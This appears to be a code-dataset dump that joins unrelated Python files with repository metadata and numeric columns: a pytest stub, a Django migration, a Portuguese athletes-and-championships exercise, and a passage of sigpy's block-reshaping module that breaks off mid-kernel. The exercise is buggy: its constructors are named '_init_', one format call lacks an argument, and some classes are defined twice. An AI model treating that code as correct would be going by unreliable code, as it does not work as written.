[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module instance_type.h
import pytest
import ec2_compare.internal.instance_type.h
def test_get_internal_data_instance_type_h_get_instances_list():
assert len(ec2_compare.internal.instance_type.h.get_instances_list()) > 0
def test_get_internal_data_instance_type_h_get():
assert len(ec2_compare.internal.instance_type.h.get) > 0
| 34.3
| 75
| 0.845481
| 56
| 343
| 4.732143
| 0.339286
| 0.271698
| 0.29434
| 0.241509
| 0.826415
| 0.826415
| 0.611321
| 0.611321
| 0.611321
| 0
| 0
| 0.015773
| 0.075802
| 343
| 9
| 76
| 38.111111
| 0.820189
| 0.087464
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
7f99395d006207eb956af04a6f570e6ac0ee2c30
| 5,590
|
py
|
Python
|
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.0.6 on 2020-06-14 05:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Color',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='色')),
],
),
migrations.CreateModel(
name='Potato',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='potato_bud_colors', to='related_name.Color')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Fruit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruit_bud_colors', to='related_name.Color')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AppleWithRelatedName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='my_apple_color', to='related_name.Color')),
],
),
migrations.CreateModel(
name='AppleWith3Color',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='default_colors', to='related_name.Color')),
('fruit_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruit_colors', related_query_name='my_fruit_colors', to='related_name.Color')),
('leaf_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leaf_colors', to='related_name.Color')),
],
options={
'default_related_name': 'default_colors',
},
),
migrations.CreateModel(
name='AppleWith2Color',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buds', to='related_name.Color')),
('fruit_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruits', to='related_name.Color')),
],
),
migrations.CreateModel(
name='AppleNoReverseWithPlus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='related_name.Color')),
],
),
migrations.CreateModel(
name='AppleNoReverseWithEndPlus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='end_plus+', to='related_name.Color')),
],
),
migrations.CreateModel(
name='AppleDefaultRelatedName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_name_appledefaultrelatedname_list', to='related_name.Color')),
],
options={
'default_related_name': '%(app_label)s_%(class)s_list',
},
),
migrations.CreateModel(
name='Apple',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='related_name.Color')),
],
),
]
| 50.818182
| 188
| 0.597138
| 579
| 5,590
| 5.56304
| 0.127807
| 0.088792
| 0.056504
| 0.088792
| 0.822726
| 0.813412
| 0.811549
| 0.75815
| 0.73145
| 0.73145
| 0
| 0.008937
| 0.259392
| 5,590
| 109
| 189
| 51.284404
| 0.769082
| 0.00805
| 0
| 0.637255
| 1
| 0
| 0.147213
| 0.025077
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6bd32f46d54d98cc09632370c1ad80e2609554b
| 5,521
|
py
|
Python
|
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
class Atletas:
def _init_(self,nome,idade,pontuacao):
self.nome = nome
self.idade = idade
self.pontuacao = pontuacao
class Amador(Atletas):
def _init_(self, nome, idade, pontuacao):
super()._init_(nome, idade, pontuacao)
self.amador = True
self.profissional = False
self.lenda = False
class Profissional(Atletas):
def _init_(self, nome, idade, pontuacao):
super()._init_(nome, idade, pontuacao)
self.amador = True
self.profissional = True
self.lenda = False
class Lenda(Atletas):
def _init_(self, nome, idade, pontuacao):
super()._init_(nome, idade, pontuacao)
self.amador = True
self.profissional = True
self.lenda = True
class Patrocinadores:
def _init_(self,nome,valor):
self.nome = nome
self.valor = valor
class Campeonato:
def _init_(self,nome,local,premiacao,patrocinadores,atletas):
self.nome = nome
self.local = local
self.premiacao = premiacao
self.patrocinadores = patrocinadores
self.atletas = atletas
def adicionar_atletas(self,*novo_atleta):
for atleta in novo_atleta:
self.atletas.append(atleta)
def adicionar_patrocinador(self,*novo_patrocionio):
for empresa in novo_patrocionio:
self.patrocinadores.append(empresa)
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 0
print('O atleta {} ficou com {} pontos'.format(nome_vencedor))
class CircuitoAmador(Campeonato):
def _init_(self, nome, local, premiacao, patrocinadores, atletas):
super()._init_(nome, local, premiacao, patrocinadores, atletas)
def adicionar_patrocinador(self, *novo_patrocionio):
return super().adicionar_patrocinador(*novo_patrocionio)
def adicionar_atletas(self, *novo_atleta):
return super().adicionar_atletas(*novo_atleta)
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 10
print('O atleta {} ficou com {} pontos'.format(nome_vencedor,atleta.pontuacao))
class CircuitoProfissional(Campeonato):
def _init_(self, nome, local, premiacao, patrocinadores, atletas):
super()._init_(nome, local, premiacao, patrocinadores, atletas)
def adicionar_patrocinador(self, *novo_patrocionio):
return super().adicionar_patrocinador(*novo_patrocionio)
def adicionar_atletas(self, *novo_atleta):
for atleta in novo_atleta:
if atleta.profissional == True or atleta.lenda == True:
self.atletas.append(atleta)
else:
return print('Está categoria não pode fazer parte deste circuito.')
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 50
print('O atleta {} ficou com {} pontos'.format(nome_vencedor,atleta.pontuacao))
class CircuitoAmador(Campeonato):
def _init_(self, nome, local, premiacao, patrocinadores, atletas):
super()._init_(nome, local, premiacao, patrocinadores, atletas)
def adicionar_patrocinador(self, *novo_patrocionio):
return super().adicionar_patrocinador(*novo_patrocionio)
def adicionar_atletas(self, *novo_atleta):
return super().adicionar_atletas(*novo_atleta)
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 10
print('O atleta {} ficou com {} pontos'.format(nome_vencedor,atleta.pontuacao))
class CircuitoProfissional(Campeonato):
def _init_(self, nome, local, premiacao, patrocinadores, atletas):
super()._init_(nome, local, premiacao, patrocinadores, atletas)
def adicionar_patrocinador(self, *novo_patrocionio):
return super().adicionar_patrocinador(*novo_patrocionio)
def adicionar_atletas(self, *novo_atleta):
for atleta in novo_atleta:
if atleta.profissional == True or atleta.lenda == True:
self.atletas.append(atleta)
else:
return print('Está categoria não pode fazer parte deste circuito.')
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 50
print('O atleta {} ficou com {} pontos'.format(nome_vencedor,atleta.pontuacao))
class CircuitoLenda(Campeonato):
def _init_(self, nome, local, premiacao, patrocinadores, atletas):
super()._init_(nome, local, premiacao, patrocinadores, atletas)
def adicionar_patrocinador(self, *novo_patrocionio):
return super().adicionar_patrocinador(*novo_patrocionio)
def adicionar_atletas(self, *novo_atleta):
for atleta in novo_atleta:
if atleta.lenda == True:
self.atletas.append(atleta)
else:
return print('Está categoria não pode fazer parte deste circuito.')
def vencedor(self,nome_vencedor):
for atleta in self.atletas:
if nome_vencedor == atleta.nome:
atleta.pontuacao += 100
print('O atleta {} ficou com {} pontos'.format(nome_vencedor,atleta.pontuacao))
| 34.080247
| 106
| 0.649158
| 598
| 5,521
| 5.827759
| 0.090301
| 0.045911
| 0.03472
| 0.047346
| 0.889527
| 0.889527
| 0.877188
| 0.866858
| 0.866858
| 0.837016
| 0
| 0.00292
| 0.255751
| 5,521
| 161
| 107
| 34.291925
| 0.845218
| 0
| 0
| 0.803419
| 0
| 0
| 0.061402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6cf8e1e4cf3c4ec76807ee6ba0e6caf90f8c85f
| 316
|
py
|
Python
|
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
"""
try:
from .NotReceived import NotReceived
from .errors import *
from .classreader import *
from .checkpoint import Checkpoint
except Exception as e:
from NotReceived import NotReceived
from errors import *
from classreader import *
from checkpoint import Checkpoint
"""
"""
import sys
print(sys.path)"""
| 19.75
| 37
| 0.759494
| 38
| 316
| 6.315789
| 0.368421
| 0.166667
| 0.175
| 0.266667
| 0.825
| 0.825
| 0.825
| 0.825
| 0.825
| 0.825
| 0
| 0
| 0.161392
| 316
| 16
| 38
| 19.75
| 0.90566
| 1.041139
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
120470c227d9ba2b49eaf7b4e99557346482221f
| 34,609
|
py
|
Python
|
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Block reshape functions.
"""
import numpy as np
import numba as nb
from sigpy import backend, config, util
__all__ = ['array_to_blocks', 'blocks_to_array']
def array_to_blocks(input, blk_shape, blk_strides):
"""Extract blocks from an array in a sliding window manner.
Args:
input (array): input array of shape [..., N_1, ..., N_D]
blk_shape (tuple): block shape of length D, with D <= 4.
blk_strides (tuple): block strides of length D.
Returns:
array: array of shape [...] + num_blks + blk_shape, where
num_blks = (N - blk_shape + blk_strides) // blk_strides.
Example:
>>> input = np.array([0, 1, 2, 3, 4, 5])
>>> print(array_to_blocks(input, [2], [2]))
[[0, 1],
[2, 3],
[4, 5]]
"""
if len(blk_shape) != len(blk_strides):
raise ValueError('blk_shape must have the same length as blk_strides.')
D = len(blk_shape)
num_blks = [(i - b + s) // s for i, b,
s in zip(input.shape[-D:], blk_shape, blk_strides)]
batch_shape = list(input.shape[:-D])
batch_size = util.prod(batch_shape)
device = backend.get_device(input)
xp = device.xp
with device:
output = xp.zeros([batch_size] + num_blks + blk_shape,
dtype=input.dtype)
input = input.reshape([batch_size] + list(input.shape[-D:]))
if D == 1:
if device == backend.cpu_device:
_array_to_blocks1(output, input,
batch_size,
blk_shape[-1],
blk_strides[-1],
num_blks[-1])
else: # pragma: no cover
_array_to_blocks1_cuda(input,
batch_size,
blk_shape[-1],
blk_strides[-1],
num_blks[-1],
output,
size=batch_size *
num_blks[-1] * blk_shape[-1])
elif D == 2:
if device == backend.cpu_device:
_array_to_blocks2(output, input,
batch_size, blk_shape[-1], blk_shape[-2],
blk_strides[-1], blk_strides[-2],
num_blks[-1], num_blks[-2])
else: # pragma: no cover
_array_to_blocks2_cuda(input,
batch_size,
blk_shape[-1], blk_shape[-2],
blk_strides[-1], blk_strides[-2],
num_blks[-1], num_blks[-2],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] *
blk_shape[-1] * blk_shape[-2])
elif D == 3:
if device == backend.cpu_device:
_array_to_blocks3(output,
input,
batch_size,
blk_shape[-1],
blk_shape[-2],
blk_shape[-3],
blk_strides[-1],
blk_strides[-2],
blk_strides[-3],
num_blks[-1],
num_blks[-2],
num_blks[-3])
else: # pragma: no cover
_array_to_blocks3_cuda(input,
batch_size,
blk_shape[-1], blk_shape[-2],
blk_shape[-3],
blk_strides[-1], blk_strides[-2],
blk_strides[-3],
num_blks[-1], num_blks[-2],
num_blks[-3],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] *
num_blks[-3] *
blk_shape[-1] * blk_shape[-2] *
blk_shape[-3])
elif D == 4:
if device == backend.cpu_device:
_array_to_blocks4(output,
input,
batch_size,
blk_shape[-1],
blk_shape[-2],
blk_shape[-3],
blk_shape[-4],
blk_strides[-1],
blk_strides[-2],
blk_strides[-3],
blk_strides[-4],
num_blks[-1],
num_blks[-2],
num_blks[-3],
num_blks[-4])
else: # pragma: no cover
_array_to_blocks4_cuda(input,
batch_size,
blk_shape[-1], blk_shape[-2],
blk_shape[-3], blk_shape[-4],
blk_strides[-1], blk_strides[-2],
blk_strides[-3], blk_strides[-4],
num_blks[-1], num_blks[-2],
num_blks[-3], num_blks[-4],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] *
num_blks[-3] * num_blks[-4] *
blk_shape[-1] * blk_shape[-2] *
blk_shape[-3] * blk_shape[-4])
else:
raise ValueError('Only support D <= 4, got {}'.format(D))
return output.reshape(batch_shape + num_blks + blk_shape)
def blocks_to_array(input, oshape, blk_shape, blk_strides):
"""Accumulate blocks into an array in a sliding window manner.
Args:
input (array): input array of shape [...] + num_blks + blk_shape
oshape (tuple): output shape.
blk_shape (tuple): block shape of length D.
blk_strides (tuple): block strides of length D.
Returns:
array: array of shape oshape.
"""
if len(blk_shape) != len(blk_strides):
raise ValueError('blk_shape must have the same length as blk_strides.')
D = len(blk_shape)
num_blks = input.shape[-(2 * D):-D]
batch_shape = list(oshape[:-D])
batch_size = util.prod(batch_shape)
device = backend.get_device(input)
xp = device.xp
with device:
output = xp.zeros([batch_size] + list(oshape[-D:]),
dtype=input.dtype)
input = input.reshape([batch_size] + list(input.shape[-2 * D:]))
if D == 1:
if device == backend.cpu_device:
_blocks_to_array1(output, input,
batch_size, blk_shape[-1],
blk_strides[-1],
num_blks[-1])
else: # pragma: no cover
if np.issubdtype(input.dtype, np.floating):
_blocks_to_array1_cuda(input,
batch_size, blk_shape[-1],
blk_strides[-1],
num_blks[-1],
output,
size=batch_size *
num_blks[-1] * blk_shape[-1])
else:
_blocks_to_array1_cuda_complex(input,
batch_size, blk_shape[-1],
blk_strides[-1],
num_blks[-1],
output,
size=batch_size
* num_blks[-1] *
blk_shape[-1])
elif D == 2:
if device == backend.cpu_device:
_blocks_to_array2(output, input,
batch_size, blk_shape[-1], blk_shape[-2],
blk_strides[-1], blk_strides[-2],
num_blks[-1], num_blks[-2])
else: # pragma: no cover
if np.issubdtype(input.dtype, np.floating):
_blocks_to_array2_cuda(input,
batch_size,
blk_shape[-1], blk_shape[-2],
blk_strides[-1], blk_strides[-2],
num_blks[-1], num_blks[-2],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] *
blk_shape[-1] * blk_shape[-2])
else: # pragma: no cover
_blocks_to_array2_cuda_complex(
input,
batch_size, blk_shape[-1], blk_shape[-2],
blk_strides[-1], blk_strides[-2],
num_blks[-1], num_blks[-2],
output,
size=batch_size * num_blks[-1] * num_blks[-2] *
blk_shape[-1] * blk_shape[-2])
elif D == 3:
if device == backend.cpu_device:
_blocks_to_array3(output,
input,
batch_size, blk_shape[-1],
blk_shape[-2],
blk_shape[-3],
blk_strides[-1],
blk_strides[-2],
blk_strides[-3],
num_blks[-1],
num_blks[-2],
num_blks[-3])
else: # pragma: no cover
if np.issubdtype(input.dtype, np.floating):
_blocks_to_array3_cuda(
input,
batch_size,
blk_shape[-1], blk_shape[-2], blk_shape[-3],
blk_strides[-1], blk_strides[-2], blk_strides[-3],
num_blks[-1], num_blks[-2], num_blks[-3],
output,
size=batch_size * num_blks[-1] * num_blks[-2] *
num_blks[-3] * blk_shape[-1] * blk_shape[-2] *
blk_shape[-3])
else:
_blocks_to_array3_cuda_complex(
input,
batch_size,
blk_shape[-1], blk_shape[-2], blk_shape[-3],
blk_strides[-1], blk_strides[-2], blk_strides[-3],
num_blks[-1], num_blks[-2], num_blks[-3],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] * num_blks[-3] *
blk_shape[-1] * blk_shape[-2] * blk_shape[-3])
elif D == 4:
if device == backend.cpu_device:
_blocks_to_array4(output,
input,
batch_size, blk_shape[-1],
blk_shape[-2],
blk_shape[-3],
blk_shape[-4],
blk_strides[-1],
blk_strides[-2],
blk_strides[-3],
blk_strides[-4],
num_blks[-1],
num_blks[-2],
num_blks[-3],
num_blks[-4])
else: # pragma: no cover
if np.issubdtype(input.dtype, np.floating):
_blocks_to_array4_cuda(
input,
batch_size, blk_shape[-1], blk_shape[-2],
blk_shape[-3], blk_shape[-4],
blk_strides[-1], blk_strides[-2],
blk_strides[-3], blk_strides[-4],
num_blks[-1], num_blks[-2],
num_blks[-3], num_blks[-4],
output,
size=batch_size *
num_blks[-1] * num_blks[-2] *
num_blks[-3] * num_blks[-4] *
blk_shape[-1] * blk_shape[-2] *
blk_shape[-3] * blk_shape[-4])
else:
_blocks_to_array4_cuda_complex(
input,
batch_size, blk_shape[-1], blk_shape[-2],
blk_shape[-3], blk_shape[-4],
blk_strides[-1], blk_strides[-2],
blk_strides[-3], blk_strides[-4],
num_blks[-1], num_blks[-2],
num_blks[-3], num_blks[-4],
output,
size=batch_size * num_blks[-1] * num_blks[-2] *
num_blks[-3] * num_blks[-4] *
blk_shape[-1] * blk_shape[-2] *
blk_shape[-3] * blk_shape[-4])
else:
raise ValueError('Only support D <= 4, got {}'.format(D))
return output.reshape(oshape)
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _array_to_blocks1(output, input, batch_size, Bx, Sx, Nx):
for b in range(batch_size):
for nx in range(Nx):
for bx in range(Bx):
ix = nx * Sx + bx
if ix < input.shape[-1]:
output[b, nx, bx] = input[b, ix]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _array_to_blocks2(output, input, batch_size, Bx, By, Sx, Sy, Nx, Ny):
for b in range(batch_size):
for ny in range(Ny):
for nx in range(Nx):
for by in range(By):
for bx in range(Bx):
iy = ny * Sy + by
ix = nx * Sx + bx
if ix < input.shape[-1] and iy < input.shape[-2]:
output[b, ny, nx, by, bx] = input[b, iy, ix]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _array_to_blocks3(output, input, batch_size, Bx, By, Bz,
Sx, Sy, Sz, Nx, Ny, Nz):
for b in range(batch_size):
for nz in range(Nz):
for ny in range(Ny):
for nx in range(Nx):
for bz in range(Bz):
for by in range(By):
for bx in range(Bx):
iz = nz * Sz + bz
iy = ny * Sy + by
ix = nx * Sx + bx
if (ix < input.shape[-1] and
iy < input.shape[-2] and
iz < input.shape[-3]):
output[b, nz, ny, nx, bz, by,
bx] = input[b, iz, iy, ix]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _array_to_blocks4(output, input, batch_size, Bx, By, Bz, Bt,
Sx, Sy, Sz, St,
Nx, Ny, Nz, Nt):
for b in range(batch_size):
for nt in range(Nt):
for nz in range(Nz):
for ny in range(Ny):
for nx in range(Nx):
for bt in range(Bt):
for bz in range(Bz):
for by in range(By):
for bx in range(Bx):
it = nt * St + bt
iz = nz * Sz + bz
iy = ny * Sy + by
ix = nx * Sx + bx
if (ix < input.shape[-1] and
iy < input.shape[-2] and
iz < input.shape[-3] and
it < input.shape[-4]):
output[b, nt, nz, ny, nx,
bt, bz, by,
bx] = input[b, it,
iz, iy, ix]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _blocks_to_array1(output, input, batch_size, Bx, Sx, Nx):
for b in range(batch_size):
for nx in range(Nx):
for bx in range(Bx):
ix = nx * Sx + bx
if ix < output.shape[-1]:
output[b, ix] += input[b, nx, bx]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _blocks_to_array2(output, input, batch_size, Bx, By, Sx, Sy, Nx, Ny):
for b in range(batch_size):
for ny in range(Ny):
for nx in range(Nx):
for by in range(By):
for bx in range(Bx):
iy = ny * Sy + by
ix = nx * Sx + bx
if ix < output.shape[-1] and iy < output.shape[-2]:
output[b, iy, ix] += input[b, ny, nx, by, bx]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _blocks_to_array3(output, input, batch_size, Bx, By, Bz, Sx, Sy, Sz,
Nx, Ny, Nz):
for b in range(batch_size):
for nz in range(Nz):
for ny in range(Ny):
for nx in range(Nx):
for bz in range(Bz):
for by in range(By):
for bx in range(Bx):
iz = nz * Sz + bz
iy = ny * Sy + by
ix = nx * Sx + bx
if (ix < output.shape[-1]
and iy < output.shape[-2]
and iz < output.shape[-3]):
output[b, iz, iy, ix] += input[b, nz,
ny, nx,
bz, by, bx]
@nb.jit(nopython=True, cache=True) # pragma: no cover
def _blocks_to_array4(output, input, batch_size, Bx, By, Bz, Bt,
Sx, Sy, Sz, St, Nx, Ny, Nz, Nt):
for b in range(batch_size):
for nt in range(Nt):
for nz in range(Nz):
for ny in range(Ny):
for nx in range(Nx):
for bt in range(Bt):
for bz in range(Bz):
for by in range(By):
for bx in range(Bx):
it = nt * St + bt
iz = nz * Sz + bz
iy = ny * Sy + by
ix = nx * Sx + bx
if (ix < output.shape[-1]
and iy < output.shape[-2]
and iz < output.shape[-3]
and it < output.shape[-4]):
output[b, it,
iz,
iy,
ix] += input[b, nt,
nz,
ny,
nx,
bt,
bz,
by,
bx]
if config.cupy_enabled: # pragma: no cover
import cupy as cp
_array_to_blocks1_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
'raw T output',
"""
const int ndim = input.ndim;
int b = i / Bx / Nx;
i -= b * Bx * Nx;
int nx = i / Bx;
i -= nx * Bx;
int bx = i;
int ix = nx * Sx + bx;
if (ix < input.shape()[ndim - 1]) {
int input_idx[] = {b, ix};
int output_idx[] = {b, nx, bx};
output[output_idx] = input[input_idx];
}
""",
name='_array_to_blocks1_cuda')
_array_to_blocks2_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 By, '
'int32 Sx, int32 Sy, int32 Nx, int32 Ny',
'raw T output',
"""
const int ndim = input.ndim;
int b = i / Bx / By / Nx / Ny;
i -= b * Bx * By * Nx * Ny;
int ny = i / Bx / By / Nx;
i -= ny * Bx * By * Nx;
int nx = i / Bx / By;
i -= nx * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]) {
int input_idx[] = {b, iy, ix};
int output_idx[] = {b, ny, nx, by, bx};
output[output_idx] = input[input_idx];
}
""",
name='_array_to_blocks2_cuda')
_array_to_blocks3_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
'raw T output',
"""
const int ndim = input.ndim;
int b = i / Bx / By / Bz / Nx / Ny / Nz;
i -= b * Bx * By * Bz * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Nx / Ny;
i -= nz * Bx * By * Bz * Nx * Ny;
int ny = i / Bx / By / Bz / Nx;
i -= ny * Bx * By * Bz * Nx;
int nx = i / Bx / By / Bz;
i -= nx * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]
&& iz < input.shape()[ndim - 3]) {
int input_idx[] = {b, iz, iy, ix};
int output_idx[] = {b, nz, ny, nx, bz, by, bx};
output[output_idx] = input[input_idx];
}
""",
name='_array_to_blocks3_cuda')
_array_to_blocks4_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, '
'int32 Bx, int32 By, int32 Bz, int32 Bt, '
'int32 Sx, int32 Sy, int32 Sz, int32 St, '
'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
'raw T output',
"""
const int ndim = input.ndim;
int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Bt / Nx / Ny;
i -= nz * Bx * By * Bz * Bt * Nx * Ny;
int ny = i / Bx / By / Bz / Bt / Nx;
i -= ny * Bx * By * Bz * Bt * Nx;
int nx = i / Bx / By / Bz / Bt;
i -= nx * Bx * By * Bz * Bt;
int bt = i / Bx / By / Bz;
i -= bt * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int it = nt * St + bt;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]
&& iz < input.shape()[ndim - 3] && it < input.shape()[ndim - 4]) {
int input_idx[] = {b, it, iz, iy, ix};
int output_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
output[output_idx] = input[input_idx];
}
""",
name='_array_to_blocks4_cuda')
_blocks_to_array1_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / Nx;
i -= b * Bx * Nx;
int nx = i / Bx;
i -= nx * Bx;
int bx = i;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1]) {
